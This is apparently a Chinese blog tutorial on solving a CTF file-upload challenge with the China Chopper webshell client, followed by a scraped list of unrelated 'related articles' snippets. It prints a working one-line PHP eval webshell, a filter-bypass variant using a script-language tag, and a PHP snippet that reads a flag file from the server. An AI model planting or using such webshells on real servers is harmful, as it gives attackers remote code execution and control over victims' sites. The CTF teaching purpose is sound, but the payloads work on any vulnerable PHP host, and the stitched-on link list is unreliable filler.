中国菜刀使用教程--ctf 文件上传
首先把包含一句话的文件上传,php内容文件如下:
<?php
eval($_POST['a']);
?>
如果会过滤 <? 和 php 关键字,可以使用长标签
<script language="pHp">@eval($_POST['sb'])</script>
打开中国菜刀主页面,右键点击添加,配置如下(密码即上面的sb)
点击右键文件管理如下:
即可获得flag:
还有一种直接在上传文件的php代码中获取flag文件的内容:
<script language="PHP">
$fh=fopen("../flag.".strtolower("PHP"),'r'); #strtolower() 函数把字符串转换为小写
echo fread($fh,filesize("../flag.".strtolower("PHP"))); #点号.是连接符,开始还用+号来连接,搞错了。
fclose($fh);
</script>
点击右键查看源代码:
--参考i春秋https://www.ichunqiu.com/battalion
中国菜刀使用教程--ctf 文件上传相关推荐
- 上传漏洞(一句话木马、中国菜刀使用、DVWA文件上传漏洞利用)
1.常见漏洞分类 2.常见验证手段 可抓包后修改扩展名为图片格式,再上传可绕过验证.如: 可以修改php文件后缀为其他,再上传.如test.php.xxx 可对图片文件添加一句话木马,再修改为.ph ...
- 超详细的实现上传文件功能教程,文件上传实现。
重要声明:本文章仅仅代表了作者个人对此观点的理解和表述.读者请查阅时持自己的意见进行讨论. 本文更新不及时,请到原文地址浏览:<超详细的实现上传文件功能教程,文件上传实现.>. 一.文件上 ...
- ctf文件上传基本思路+例题
目录 简介 一句话木马 蚁剑 例题 总结思路 附言 简介 文件上传本质上就是将文件传输到服务器时没有做好检测和过滤,导致可上传恶意程序到服务器,从而获得后台权限来干点坏事.一般这个恶意脚本文件称为we ...
- i春秋-ctf 文件上传
文章目录 前言 一.题目 二.解题步骤 1.我的错误思路 2.正确解题姿势 总结 前言 CTF小白,这道题思考了很久,i春秋上现在也没write up,卡了1天了,后面在buuctf找到了题解答.通过 ...
- bottle 文件服务器,python bottle 框架基础教程:文件上传 | linux系统运维
文件上传,需要注意的是前端html的form表单中,要添加 enctype="multipart/form-data"属性,否则无法上传文件.在后端,用request.files方 ...
- struts2教程--实现文件上传下载
Struts2文件上传下载 一.Struts2文件上传 提供 FileUpload 拦截器,用于解析 multipart/form-data 编码格式请求,解析上传文件的内容 fileUpload拦截 ...
- spring boot基础教程之文件上传下载
一文件上传 文件上传主要分以下几个步骤: (1)新建maven java project: (2)在pom.xml加入相应依赖: (3)新建一个文件上传表单页面; (4)编写controller; ( ...
- 菜鸟教程php 文件上传,php入门学习知识点三 PHP上传
if(is_uploaded_file($_FILES["Imgs"]["tmp_name"])){ $phpupfile=$_FILES["Imgs ...
- Flask 的完全使用教程(文件上传下载,cookie,session,template使用)
Flash是python下的一个轻量级web服务框架,通过Flash可以快速的搭建api服务器和各位网站,在深度学习中Flash用的最多的就是模型的部署.配合上一些c++ dll库的调用,比如这个库( ...
最新文章
- 华为: 即将发布5G+VR的颠覆式智能眼镜
- 关于如何在Nomad中保护工作部署的工作流的简要历史
- 转载:Linux 的系统服务及其配置(略有修改)
- Qt Creator和VS2010中添加槽信号_差异与详解
- java排序-交换排序-快速排序
- Angularjs1.x 项目结构
- LoRa、Sigfox和NB-IoT在物联网趋势中谁是你的最佳拍档?
- 析构函数virtual与非virtual区别
- 配置Redis主从复制
- 自学it18大数据笔记-第二阶段Hive-day4——会持续更新……
- Bitmap存储入门
- 20 ViewPager Demo4自动轮播
- layui 自定义request_Layui自定义模块的使用方式
- C#实现Zip文件解压
- Android 常用开发工具以及Mac常用软件
- 硬件工程师成长之路(2)——电路设计
- 离散型特征的处理方法
- 学习笔记二:接口与继承(内部类)
- 晶品特装在科创板上市:总市值约为48亿元,前三季度收入下滑12%
- 冰箱中的爱马仕没跑了,用COLMO来开启你的美好新春吧
热门文章
- golang 设置goproxy代理的小细节,适用于go module下载超时,阿里云镜像go module下载超时
- Gradle sync failed: Sync failed: reason unknown
- ps计算机海报设计,ps海报设计心得.docx
- load()方法异步请求数据
- 【Fungus笔记】No.12:Load Scene(加载场景 / 转场)
- Linux命令篇:chmod 777 与 chmod +x
- 64位win7系统中vb工程显示加载MSCOMCTL.OCX失败
- 袖珍计算器c语言设计源码,Calculator 示例:Windows 窗体袖珍计算器
- 【学习笔记】大数据技术之Flume
- 外接u盘/硬盘安装CentOS(linux)的步骤(含双系统)